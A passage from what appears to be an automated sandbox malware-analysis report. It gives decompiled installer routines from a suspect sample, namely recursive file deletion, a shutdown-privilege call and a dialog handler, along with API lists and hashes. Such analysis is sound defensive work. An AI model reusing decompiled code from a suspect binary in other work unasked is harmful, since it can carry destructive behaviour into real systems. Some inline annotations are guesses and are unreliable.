                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C04
                                          • ExitProcess.KERNEL32 ref: 00403C25
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                          • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                          • API String ID: 2292928366-4036104658
                                          • Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                                          • Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
                                          • Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                                          • Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          [Basic-block edge list for the function at 405d7a (blocks 405d7a through 405f3a, calling DeleteFileW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW and FindClose, with a recursive call back into 405d7a). The rendered graph and its Executed / Not Executed colouring are not reproduced here; the decompiled C-Code below covers the same blocks.]
                                          C-Code - Quality: 98%
                                          			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				short _v556;
                                          				short _v558;
                                          				struct _WIN32_FIND_DATAW _v604;
                                          				signed int _t38;
                                          				signed int _t52;
                                          				signed int _t55;
                                          				signed int _t62;
                                          				void* _t64;
                                          				signed char _t65;
                                          				WCHAR* _t66;
                                          				void* _t67;
                                          				WCHAR* _t68;
                                          				void* _t70;
                                          
                                          				_t65 = _a8;                          // flags
                                          				_t68 = _a4;                          // path buffer, edited in place below
                                          				_v8 = _t65 & 0x00000004;             // bit 2 is saved; it decides what happens when a delete fails
                                          				_t38 = E00406045(__eflags, _t68);    // check on the target path; the result is tested again before the directory-removal branch (L28)
                                          				_v12 = _t38;
                                          				if((_t65 & 0x00000008) != 0) {       // bit 3: a single DeleteFileW, no enumeration, failure added to the counter at 0x7a8b28
                                          					_t62 = DeleteFileW(_t68); // executed
                                          					asm("sbb eax, eax");
                                          					_t64 =  ~_t62 + 1;
                                          					 *0x7a8b28 =  *0x7a8b28 + _t64;
                                          					return _t64;
                                          				}
                                          				_a4 = _t65;
                                          				_t8 =  &_a4;
                                          				 *_t8 = _a4 & 0x00000001;            // bit 0: directory mode
                                          				__eflags =  *_t8;
                                          				if( *_t8 == 0) {
                                          					L5:
                                          					E0040666E(0x7a3f90, _t68);       // copy the path into the static buffer used as the FindFirstFileW pattern
                                          					__eflags = _a4;
                                          					if(_a4 == 0) {
                                          						E00405F89(_t68);             // not directory mode: the path itself carries the wildcard (presumably trimmed back to its directory part here)
                                          					} else {
                                          						lstrcatW(0x7a3f90, L"\\*.*"); // directory mode: enumerate everything in the directory
                                          					}
                                          					__eflags =  *_t68;
                                          					if( *_t68 != 0) {
                                          						L10:
                                          						lstrcatW(_t68, 0x40a014);
                                          						L11:
                                          						_t66 =  &(_t68[lstrlenW(_t68)]);
                                          						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
                                          						_t70 = _t38;
                                          						__eflags = _t70 - 0xffffffff;
                                          						if(_t70 == 0xffffffff) {
                                          							L26:
                                          							__eflags = _a4;
                                          							if(_a4 != 0) {
                                          								_t30 = _t66 - 2;
                                          								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                          								__eflags =  *_t30;
                                          							}
                                          							goto L28;
                                          						} else {
                                          							goto L12;
                                          						}
                                          						do {
                                          							L12:
                                          							__eflags = _v604.cFileName - 0x2e;   // 0x2e == '.'; with the _v558/_v556 checks below this skips the "." and ".." entries
                                          							if(_v604.cFileName != 0x2e) {
                                          								L16:
                                          								E0040666E(_t66,  &(_v604.cFileName));
                                          								__eflags = _v604.dwFileAttributes & 0x00000010;   // FILE_ATTRIBUTE_DIRECTORY
                                          								if(__eflags == 0) {
                                          									_t52 = E00405D32(__eflags, _t68, _v8);        // plain file: delete helper, bit 2 passed through
                                          									__eflags = _t52;
                                          									if(_t52 != 0) {
                                          										E004056D0(0xfffffff2, _t68);              // success: status helper
                                          									} else {
                                          										__eflags = _v8 - _t52;
                                          										if(_v8 == _t52) {
                                          											 *0x7a8b28 =  *0x7a8b28 + 1;          // failure without bit 2: error counter
                                          										} else {
                                          											E004056D0(0xfffffff1, _t68);          // failure with bit 2: different status ID,
                                          											E0040642E(_t67, _t68, 0);             // then a second helper instead of the counter
                                          										}
                                          									}
                                          								} else {
                                          									__eflags = (_a8 & 0x00000003) - 3;
                                          									if(__eflags == 0) {
                                          										E00405D7A(__eflags, _t68, _a8);           // subdirectory: recurse only when bits 0 and 1 are both set
                                          									}
                                          								}
                                          								}
                                          								goto L24;
                                          							}
                                          							__eflags = _v558;
                                          							if(_v558 == 0) {
                                          								goto L24;
                                          							}
                                          							__eflags = _v558 - 0x2e;
                                          							if(_v558 != 0x2e) {
                                          								goto L16;
                                          							}
                                          							__eflags = _v556;
                                          							if(_v556 == 0) {
                                          								goto L24;
                                          							}
                                          							goto L16;
                                          							L24:
                                          							_t55 = FindNextFileW(_t70,  &_v604); // executed
                                          							__eflags = _t55;
                                          						} while (_t55 != 0);
                                          						_t38 = FindClose(_t70); // executed
                                          						goto L26;
                                          					}
                                          					__eflags =  *0x7a3f90 - 0x5c;
                                          					if( *0x7a3f90 != 0x5c) {
                                          						goto L11;
                                          					}
                                          					goto L10;
                                          				} else {
                                          					__eflags = _t38;
                                          					if(_t38 == 0) {
                                          						L28:
                                          						__eflags = _a4;
                                          						if(_a4 == 0) {
                                          							L36:
                                          							return _t38;
                                          						}
                                          						__eflags = _v12;
                                          						if(_v12 != 0) {
                                          							_t38 = E004069A4(_t68);
                                          							__eflags = _t38;
                                          							if(_t38 == 0) {
                                          								goto L36;
                                          							}
                                          							E00405F3D(_t68);
                                          							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
                                          							__eflags = _t38;
                                          							if(_t38 != 0) {
                                          								return E004056D0(0xffffffe5, _t68);
                                          							}
                                          							__eflags = _v8;
                                          							if(_v8 == 0) {
                                          								goto L30;
                                          							}
                                          							E004056D0(0xfffffff1, _t68);
                                          							return E0040642E(_t67, _t68, 0);
                                          						}
                                          						L30:
                                          						 *0x7a8b28 =  *0x7a8b28 + 1;
                                          						return _t38;
                                          					}
                                          					__eflags = _t65 & 0x00000002;
                                          					if((_t65 & 0x00000002) == 0) {
                                          						goto L28;
                                          					}
                                          					goto L5;
                                          				}
                                          			}

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,7556D4C4,755513E0,00000000), ref: 00405DA3
                                          • lstrcatW.KERNEL32 ref: 00405DEB
                                          • lstrcatW.KERNEL32 ref: 00405E0E
                                          • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,7556D4C4,755513E0,00000000), ref: 00405E14
                                          • FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,7556D4C4,755513E0,00000000), ref: 00405E24
                                          • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
                                          • FindClose.KERNELBASE(00000000), ref: 00405ED3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: .$.$\*.*
                                          • API String ID: 2035342205-3749113046
                                          • Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                                          • Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
                                          • Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
                                          • Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004069A4(WCHAR* _a4) {
                                          				void* _t2;
                                          
                                          				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
                                          				if(_t2 == 0xffffffff) {
                                          					return 0;
                                          				}
                                          				FindClose(_t2);
                                          				return 0x7a4fd8;
                                          			}

                                          APIs
                                          • FindFirstFileW.KERNELBASE(7556D4C4,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,7556D4C4,?,755513E0,00405D9A,?,7556D4C4,755513E0), ref: 004069AF
                                          • FindClose.KERNEL32(00000000), ref: 004069BB
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                                          • Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
                                          • Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
                                          • Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          [Interactive control-flow graph figure in the original report (nodes coloured Executed / Not Executed), covering basic blocks 0x4040cb through 0x404553 of E004040CB; the graph data is not reproduced here]
                                          C-Code - Quality: 84%
                                          			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                          				struct HWND__* _v28;
                                          				void* _v84;
                                          				void* _v88;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t34;
                                          				signed int _t36;
                                          				signed int _t38;
                                          				struct HWND__* _t48;
                                          				signed int _t67;
                                          				struct HWND__* _t73;
                                          				signed int _t86;
                                          				struct HWND__* _t91;
                                          				signed int _t99;
                                          				int _t103;
                                          				signed int _t117;
                                          				int _t118;
                                          				int _t122;
                                          				signed int _t124;
                                          				struct HWND__* _t127;
                                          				struct HWND__* _t128;
                                          				int _t129;
                                          				intOrPtr _t130;
                                          				long _t133;
                                          				int _t135;
                                          				int _t136;
                                          				void* _t137;
                                          
                                          				_t130 = _a8;
                                          				if(_t130 == 0x110 || _t130 == 0x408) {
                                          					_t34 = _a12;
                                          					_t127 = _a4;
                                          					__eflags = _t130 - 0x110;
                                          					 *0x7a1f70 = _t34;
                                          					if(_t130 == 0x110) {
                                          						 *0x7a8aa8 = _t127;
                                          						 *0x7a1f84 = GetDlgItem(_t127, 1);
                                          						_t91 = GetDlgItem(_t127, 2);
                                          						_push(0xffffffff);
                                          						_push(0x1c);
                                          						 *0x79ff50 = _t91;
                                          						E004045CA(_t127);
                                          						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88);
                                          						 *0x7a7a6c = E0040140B(4);
                                          						_t34 = 1;
                                          						__eflags = 1;
                                          						 *0x7a1f70 = 1;
                                          					}
                                          					_t124 =  *0x40a39c; // 0x0
                                          					_t136 = 0;
                                          					_t133 = (_t124 << 6) +  *0x7a8ac0;
                                          					__eflags = _t124;
                                          					if(_t124 < 0) {
                                          						L36:
                                          						E00404616(0x40b);
                                          						while(1) {
                                          							_t36 =  *0x7a1f70;
                                          							 *0x40a39c =  *0x40a39c + _t36;
                                          							_t133 = _t133 + (_t36 << 6);
                                          							_t38 =  *0x40a39c; // 0x0
                                          							__eflags = _t38 -  *0x7a8ac4;
                                          							if(_t38 ==  *0x7a8ac4) {
                                          								E0040140B(1);
                                          							}
                                          							__eflags =  *0x7a7a6c - _t136;
                                          							if( *0x7a7a6c != _t136) {
                                          								break;
                                          							}
                                          							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
                                          							if(__eflags >= 0) {
                                          								break;
                                          							}
                                          							_t117 =  *(_t133 + 0x14);
                                          							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
                                          							_push( *((intOrPtr*)(_t133 + 0x20)));
                                          							_push(0xfffffc19);
                                          							E004045CA(_t127);
                                          							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                          							_push(0xfffffc1b);
                                          							E004045CA(_t127);
                                          							_push( *((intOrPtr*)(_t133 + 0x28)));
                                          							_push(0xfffffc1a);
                                          							E004045CA(_t127);
                                          							_t48 = GetDlgItem(_t127, 3);
                                          							__eflags =  *0x7a8b2c - _t136;
                                          							_v28 = _t48;
                                          							if( *0x7a8b2c != _t136) {
                                          								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                          								__eflags = _t117;
                                          							}
                                          							ShowWindow(_t48, _t117 & 0x00000008);
                                          							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                          							E004045EC(_t117 & 0x00000002);
                                          							_t118 = _t117 & 0x00000004;
                                          							EnableWindow( *0x79ff50, _t118);
                                          							__eflags = _t118 - _t136;
                                          							if(_t118 == _t136) {
                                          								_push(1);
                                          							} else {
                                          								_push(_t136);
                                          							}
                                          							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                          							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                          							__eflags =  *0x7a8b2c - _t136;
                                          							if( *0x7a8b2c == _t136) {
                                          								_push( *0x7a1f84);
                                          							} else {
                                          								SendMessageW(_t127, 0x401, 2, _t136);
                                          								_push( *0x79ff50);
                                          							}
                                          							E004045FF();
                                          							E0040666E(0x7a1f88, E004040AC());
                                          							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
                                          							SetWindowTextW(_t127, 0x7a1f88);
                                          							_push(_t136);
                                          							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                          							__eflags = _t67;
                                          							if(_t67 != 0) {
                                          								continue;
                                          							} else {
                                          								__eflags =  *_t133 - _t136;
                                          								if( *_t133 == _t136) {
                                          									continue;
                                          								}
                                          								__eflags =  *(_t133 + 4) - 5;
                                          								if( *(_t133 + 4) != 5) {
                                          									DestroyWindow( *0x7a7a78);
                                          									 *0x7a0f60 = _t133;
                                          									__eflags =  *_t133 - _t136;
                                          									if( *_t133 <= _t136) {
                                          										goto L60;
                                          									}
                                          									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                                          									__eflags = _t73 - _t136;
                                          									 *0x7a7a78 = _t73;
                                          									if(_t73 == _t136) {
                                          										goto L60;
                                          									}
                                          									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                          									_push(6);
                                          									E004045CA(_t73);
                                          									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                          									ScreenToClient(_t127, _t137 + 0x10);
                                          									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                          									_push(_t136);
                                          									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                          									__eflags =  *0x7a7a6c - _t136;
                                          									if( *0x7a7a6c != _t136) {
                                          										goto L63;
                                          									}
                                          									ShowWindow( *0x7a7a78, 8);
                                          									E00404616(0x405);
                                          									goto L60;
                                          								}
                                          								__eflags =  *0x7a8b2c - _t136;
                                          								if( *0x7a8b2c != _t136) {
                                          									goto L63;
                                          								}
                                          								__eflags =  *0x7a8b20 - _t136;
                                          								if( *0x7a8b20 != _t136) {
                                          									continue;
                                          								}
                                          								goto L63;
                                          							}
                                          						}
                                          						DestroyWindow( *0x7a7a78); // executed
                                          						 *0x7a8aa8 = _t136;
                                          						EndDialog(_t127,  *0x7a0758); // executed
                                          						goto L60;
                                          					} else {
                                          						__eflags = _t34 - 1;
                                          						if(_t34 != 1) {
                                          							L35:
                                          							__eflags =  *_t133 - _t136;
                                          							if( *_t133 == _t136) {
                                          								goto L63;
                                          							}
                                          							goto L36;
                                          						}
                                          						_push(0);
                                          						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                          						__eflags = _t86;
                                          						if(_t86 == 0) {
                                          							goto L35;
                                          						}
                                          						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
                                          						__eflags =  *0x7a7a6c;
                                          						return 0 |  *0x7a7a6c == 0x00000000;
                                          					}
                                          				} else {
                                          					_t127 = _a4;
                                          					_t136 = 0;
                                          					if(_t130 == 0x47) {
                                          						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
                                          					}
                                          					_t122 = _a12;
                                          					if(_t130 != 5) {
                                          						L8:
                                          						if(_t130 != 0x40d) {
                                          							__eflags = _t130 - 0x11;
                                          							if(_t130 != 0x11) {
                                          								__eflags = _t130 - 0x111;
                                          								if(_t130 != 0x111) {
                                          									goto L28;
                                          								}
                                          								_t135 = _t122 & 0x0000ffff;
                                          								_t128 = GetDlgItem(_t127, _t135);
                                          								__eflags = _t128 - _t136;
                                          								if(_t128 == _t136) {
                                          									L15:
                                          									__eflags = _t135 - 1;
                                          									if(_t135 != 1) {
                                          										__eflags = _t135 - 3;
                                          										if(_t135 != 3) {
                                          											_t129 = 2;
                                          											__eflags = _t135 - _t129;
                                          											if(_t135 != _t129) {
                                          												L27:
                                          												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
                                          												goto L28;
                                          											}
                                          											__eflags =  *0x7a8b2c - _t136;
                                          											if( *0x7a8b2c == _t136) {
                                          												_t99 = E0040140B(3);
                                          												__eflags = _t99;
                                          												if(_t99 != 0) {
                                          													goto L28;
                                          												}
                                          												 *0x7a0758 = 1;
                                          												L23:
                                          												_push(0x78);
                                          												L24:
                                          												E004045A3();
                                          												goto L28;
                                          											}
                                          											E0040140B(_t129);
                                          											 *0x7a0758 = _t129;
                                          											goto L23;
                                          										}
                                          										__eflags =  *0x40a39c - _t136; // 0x0
                                          										if(__eflags <= 0) {
                                          											goto L27;
                                          										}
                                          										_push(0xffffffff);
                                          										goto L24;
                                          									}
                                          									_push(_t135);
                                          									goto L24;
                                          								}
                                          								SendMessageW(_t128, 0xf3, _t136, _t136);
                                          								_t103 = IsWindowEnabled(_t128);
                                          								__eflags = _t103;
                                          								if(_t103 == 0) {
                                          									L63:
                                          									return 0;
                                          								}
                                          								goto L15;
                                          							}
                                          							SetWindowLongW(_t127, _t136, _t136);
                                          							return 1;
                                          						}
                                          						DestroyWindow( *0x7a7a78);
                                          						 *0x7a7a78 = _t122;
                                          						L60:
                                          						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
                                          							ShowWindow(_t127, 0xa);
                                          							 *0x7a3f88 = 1;
                                          						}
                                          						goto L63;
                                          					} else {
                                          						asm("sbb eax, eax");
                                          						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
                                          						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                          							L28:
                                          							return E00404631(_a8, _t122, _a16);
                                          						} else {
                                          							ShowWindow(_t127, 4);
                                          							goto L8;
                                          						}
                                          					}
                                          				}
			}

                                          0x004040d6
                                          0x004040dd
                                          0x00404244
                                          0x00404248
                                          0x0040424c
                                          0x0040424e
                                          0x00404253
                                          0x0040425e
                                          0x00404269
                                          0x0040426e
                                          0x00404270
                                          0x00404272
                                          0x00404275
                                          0x0040427a
                                          0x00404288
                                          0x00404295
                                          0x0040429c
                                          0x0040429c
                                          0x0040429d
                                          0x0040429d
                                          0x004042a2
                                          0x004042a8
                                          0x004042af
                                          0x004042b5
                                          0x004042b7
                                          0x004042f7
                                          0x004042fc
                                          0x00404301
                                          0x00404301
                                          0x00404306
                                          0x0040430f
                                          0x00404311
                                          0x00404316
                                          0x0040431c
                                          0x00404320
                                          0x00404320
                                          0x00404325
                                          0x0040432b
                                          0x00000000
                                          0x00000000
                                          0x00404336
                                          0x0040433c
                                          0x00000000
                                          0x00000000
                                          0x00404345
                                          0x0040434d
                                          0x00404352
                                          0x00404355
                                          0x0040435b
                                          0x00404360
                                          0x00404363
                                          0x00404369
                                          0x0040436e
                                          0x00404371
                                          0x00404377
                                          0x0040437f
                                          0x00404385
                                          0x0040438b
                                          0x0040438f
                                          0x00404396
                                          0x00404396
                                          0x00404396
                                          0x004043a0
                                          0x004043b2
                                          0x004043be
                                          0x004043c3
                                          0x004043cd
                                          0x004043d3
                                          0x004043d5
                                          0x004043da
                                          0x004043d7
                                          0x004043d7
                                          0x004043d7
                                          0x004043ea
                                          0x00404402
                                          0x00404404
                                          0x0040440a
                                          0x0040441f
                                          0x0040440c
                                          0x00404415
                                          0x00404417
                                          0x00404417
                                          0x00404425
                                          0x00404436
                                          0x0040444c
                                          0x00404453
                                          0x00404459
                                          0x0040445d
                                          0x00404462
                                          0x00404464
                                          0x00000000
                                          0x0040446a
                                          0x0040446a
                                          0x0040446c
                                          0x00000000
                                          0x00000000
                                          0x00404472
                                          0x00404476
                                          0x0040449b
                                          0x004044a1
                                          0x004044a7
                                          0x004044a9
                                          0x00000000
                                          0x00000000
                                          0x004044cf
                                          0x004044d5
                                          0x004044d7
                                          0x004044dc
                                          0x00000000
                                          0x00000000
                                          0x004044e2
                                          0x004044e5
                                          0x004044e8
                                          0x004044ff
                                          0x0040450b
                                          0x00404524
                                          0x0040452a
                                          0x0040452e
                                          0x00404533
                                          0x00404539
                                          0x00000000
                                          0x00000000
                                          0x00404543
                                          0x0040454e
                                          0x00000000
                                          0x0040454e
                                          0x00404478
                                          0x0040447e
                                          0x00000000
                                          0x00000000
                                          0x00404484
                                          0x0040448a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404490
                                          0x00404464
                                          0x0040455b
                                          0x00404567
                                          0x0040456e
                                          0x00000000
                                          0x004042b9
                                          0x004042b9
                                          0x004042bc
                                          0x004042ef
                                          0x004042ef
                                          0x004042f1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004042f1
                                          0x004042be
                                          0x004042c2
                                          0x004042c7
                                          0x004042c9
                                          0x00000000
                                          0x00000000
                                          0x004042d9
                                          0x004042e1
                                          0x00000000
                                          0x004042e7
                                          0x004040ef
                                          0x004040ef
                                          0x004040f3
                                          0x004040f8
                                          0x00404107
                                          0x00404107
                                          0x0040410d
                                          0x00404114
                                          0x00404158
                                          0x0040415e
                                          0x00404177
                                          0x0040417a
                                          0x0040418d
                                          0x00404193
                                          0x00000000
                                          0x00000000
                                          0x00404199
                                          0x004041a4
                                          0x004041a6
                                          0x004041a8
                                          0x004041c7
                                          0x004041c7
                                          0x004041ca
                                          0x004041cf
                                          0x004041d2
                                          0x004041e2
                                          0x004041e3
                                          0x004041e5
                                          0x0040421b
                                          0x0040422b
                                          0x00000000
                                          0x0040422b
                                          0x004041e7
                                          0x004041ed
                                          0x00404206
                                          0x0040420b
                                          0x0040420d
                                          0x00000000
                                          0x00000000
                                          0x0040420f
                                          0x004041fb
                                          0x004041fb
                                          0x004041fd
                                          0x004041fd
                                          0x00000000
                                          0x004041fd
                                          0x004041f0
                                          0x004041f5
                                          0x00000000
                                          0x004041f5
                                          0x004041d4
                                          0x004041da
                                          0x00000000
                                          0x00000000
                                          0x004041dc
                                          0x00000000
                                          0x004041dc
                                          0x004041cc
                                          0x00000000
                                          0x004041cc
                                          0x004041b2
                                          0x004041b9
                                          0x004041bf
                                          0x004041c1
                                          0x00404597
                                          0x00000000
                                          0x00404597
                                          0x00000000
                                          0x004041c1
                                          0x0040417f
                                          0x00000000
                                          0x00404187
                                          0x00404166
                                          0x0040416c
                                          0x00404574
                                          0x0040457a
                                          0x00404587
                                          0x0040458d
                                          0x0040458d
                                          0x00000000
                                          0x00404116
                                          0x0040411b
                                          0x00404127
                                          0x00404130
                                          0x00404231
                                          0x00000000
                                          0x0040414f
                                          0x00404152
                                          0x00000000
                                          0x00404152
                                          0x00404130
                                          0x00404114

                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
                                          • ShowWindow.USER32(?), ref: 00404127
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404139
                                          • ShowWindow.USER32(?,00000004), ref: 00404152
                                          • DestroyWindow.USER32 ref: 00404166
                                          • SetWindowLongW.USER32 ref: 0040417F
                                          • GetDlgItem.USER32(?,?), ref: 0040419E
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
                                          • IsWindowEnabled.USER32(00000000), ref: 004041B9
                                          • GetDlgItem.USER32(?,00000001), ref: 00404264
                                          • GetDlgItem.USER32(?,00000002), ref: 0040426E
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404288
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
                                          • GetDlgItem.USER32(?,00000003), ref: 0040437F
                                          • ShowWindow.USER32(00000000,?), ref: 004043A0
                                          • EnableWindow.USER32(?,?), ref: 004043B2
                                          • EnableWindow.USER32(?,?), ref: 004043CD
                                          • GetSystemMenu.USER32 ref: 004043E3
                                          • EnableMenuItem.USER32 ref: 004043EA
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
                                          • lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
                                          • SetWindowTextW.USER32 ref: 00404453
